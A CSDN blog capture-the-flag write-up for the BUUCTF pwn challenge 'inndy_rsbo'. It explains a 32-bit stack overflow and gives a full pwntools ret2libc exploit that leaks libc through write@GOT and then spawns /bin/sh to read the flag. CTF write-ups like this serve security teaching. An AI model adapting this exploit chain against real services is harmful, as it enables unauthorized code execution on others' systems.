[BUUCTF-pwn] inndy_rsbo

最新推荐文章于 2022-09-09 15:28:21 发布
最新推荐文章于 2022-09-09 15:28:21 发布
阅读量122 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122795976
版权

ida也不可全信。题目很简单就是有个溢出。32位no pie直接就write(write)但试了一下不行。用gdb跟一下发现,ida给的buf = ebp -0x60不对,应该是0x68 改为68就解决了

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[80]; // [esp+10h] [ebp-60h] BYREF
  int v5; // [esp+60h] [ebp-10h]
  int v6; // [esp+64h] [ebp-Ch]
  signed int v7; // [esp+68h] [ebp-8h]
  int i; // [esp+6Ch] [ebp-4h]

  alarm(0x1Eu);
  init();
  v7 = read_80_bytes(buf); 
  for ( i = 0; i < v7; ++i )
  {
    v6 = rand() % (i + 1);
    v5 = buf[i];
    buf[i] = buf[v6];
    buf[v6] = v5;
  }
  write(1, buf, v7);
  return 0;
}
ssize_t __cdecl read_80_bytes(void *buf)
{
  return read(0, buf, 0x80u);   //溢出点,本意输入80字节,结果可以输入0x80字节
}

完整exp:

from pwn import *

'''
patchelf --set-interpreter ../buuoj_2.23_i386/ld-2.23-i386-0ubuntu11.so pwn
patchelf --add-needed ../buuoj_2.23_i386/libc-2.23-i386-0ubuntu11.so pwn
'''
local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 26671) 
libc_elf = ELF('../buuoj_2.23_i386/libc-2.23-i386-0ubuntu11.so')
one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
offset_main_ret = 0x18637
elf = ELF('./pwn')
context(arch='i386', log_level='debug')

payload = flat(b'\x00'*0x68, 0, elf.plt['write'], elf.sym['_start'], 1, elf.got['write'], 4)
p.send(payload.ljust(0x80, b'A'))

libc_base = u32(p.recv(4)) - libc_elf.sym['write']
libc_elf.address = libc_base

payload = flat(b'\x00'*0x68, 0, libc_elf.sym['system'], elf.sym['_start'], next(libc_elf.search(b'/bin/sh')))
p.send(payload.ljust(0x80, b'A'))

p.sendline('cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PatchELF 给你的软件找一个动态库
dxs18459111694的博客
10-24 894
对于经常在服务器上跑程序或安装程序的朋友,不可避免的会遇到一些问题。其中最常见的问题就是,像下面这样glibc库找不到的问题,当然也可能会有其他库找不到的问题。那出现这种问题该怎么办呢?
Linux使用patchelf工具
热门推荐
juluwangriyue的博客
09-16 3万+
github地址:https://github.com/NixOS/patchelf 下载地址:https://github.com/NixOS/patchelf/releases 我直接下载的是PatchELF 0.12 patchelf-0.12.tar.gz 解压: $ tar -axf patchelf-0.12.tar.gz $ cd patchelf-0.12/ $ ls bootstrap.sh COPYING Makefile.am README.md
Linux 库文件劫持
travelnight的博客
09-09 2058
Linux库文件劫持
patchelf 的功能以及使用 patchelf 修改 rpath 以解决动态库问题
龙瑜的博客
09-12 2万+
在 低版本 libc 库运行高版本 libc 库编译的程序 这篇博客中我描述了使用 patchelf 来修改动态库链接器的方法,在本篇文章中,我完整的列举下 patchelf 的功能,并介绍另外一个实际的应用。 patchelf 具有的功能 运行 patchelf -h 能够得到如下信息: syntax: patchelf [--set-interpreter FILENAME] [--page-size SIZE] [--print-interpreter] [--print-soname
第三方so通过patchelf兼容低版本glibc
zdy0_2004的专栏
02-29 946
第三方so通过patchelf兼容低版本glibc https://blog.csdn.net/qq_33873431/article/details/97751520?depth_1-utm_source=distribute.wap_relevant.none-task&utm_source=distribute.wap_relevant.none-task 背景:第三方so依赖g...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
非root账户用patchelf对低版本glibc修正
LYZ的备忘录
12-29 861
最近看了Yuanming Hu同学主持开发的taichi库在Physical Simulation中的应用,印象深刻。自己在调用taichi库时因服务器glibc版本较低,出现了一点意外,将修正过程记录如下: (1)anaconda3装在服务器上之后,新建一个py36(64位 python3.6)的环境。 (2)在py36中通过如下命令即可顺利安装taichi库。 python -m pip install taichi (3)在测试examples时提示glibc版本较低,程序无法运行。 t
[XCTF-pwn] 15_厦门邀请赛-pwn
weixin_52640415的博客
03-04 319
同样是写溢出到return的题,这题设置了canary,canary这个机制是把一个0+7位随机数放在rbp的前面,如果发现被改动就调用check_stack_fail然后退出。 这个题有循环,只有退出时才会检查,所以在前边可以输入适当长度带出canary在退出前再恢复 from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
PatchELF 修改linux下elf文件library搜索路径
奋斗中拥有
09-07 1万+
http://nixos.org/patchelf.html wget http://nixos.org/releases/patchelf/patchelf-0.8/patchelf-0.8.tar.bz2 tar -zxf patchelf-0.8.tar.bz2 cd patchelf-0.8 ./configure --prefix=/usr make && make install
js动态拼接找不到class_找不到动态链接库?
weixin_29625757的博客
01-19 247
PatchELF前言对于经常在服务器上跑程序或安装程序的朋友,不可避免的会遇到一些问题。其中最常见的问题就是,像下面这样version `GLIBC_2.23' not foundversion `GLIBC_2.15' not foundglibc 库找不到的问题,当然也可能会有其他库找不到的问题。那出现这种问题该怎么办呢?常用解决方案针对这一问题,网上搜索的答案大部分都是分为以下几步...
安装多版本python27并开启enable-shared
小小郭
07-04 3179
安装多个python27的版本,如果不开启enable-shared,指定不同路径即可。当开启enable-shared时,默认只有一个版本的python。 通过ldd查看关联的库,会发现都指向了同一个libpython2.7.so.1.0。# 通过gcc4编译安装的python27,指向的是/opt/python27/lib [root@cs-pl-test Python-2.7.2]# ldd
【linux】程序找不到动态库.so的解决办法|查看.so动态库信息|.so动态库加载顺序
bandaoyu的note
01-26 1万+
方法一:添加环境变量 子招数1. 添加当前用户当前终端的环境变量-临时 export LD_LIBRARY_PATH=/home/czd/... #.so file path 子招数2. 添加当前用户的环境变量 修改~/.bashrc文件,在其末尾,添加环境变量 vim ~/.bashrc export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/czd/... #.so file path 使其生效, source ~/.bashrc 如不能生
ARM64开发板基于gnome+wayland搭建Qt5运行环境
yikunbai5708的博客
12-25 3445
目录 引言 1 搭建gnome桌面 1.1 简介 1.2 安装gnome桌面 2 安装qt相关依赖 2.1 安装qt库及examples 2.2 安装qtcreator 3 使用打包工具打包qt demo 3.1 安装依赖工具 3.2 使用打包工具打包Qt demo 引言 首先,还是让我们来重温一下armel、armhf和arm64的区别吧 eabi:embedded a...
64升级glibc_Linux 修改 ELF 解决 glibc 兼容性问题
weixin_32050773的博客
01-12 494
转自:Soul Of Free Loop链接:https://zohead.com/archives/mod-elf-glibc/Linux glibc 问题相信有不少 Linux 用户都碰到过运行第三方(非系统自带软件源)发布的程序时的 glibc 兼容性问题,这一般是由于当前 Linux 系统上的 GNU C 库(glibc)版本比较老导致的,例如我在 CentOS 6 64 位系统...
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值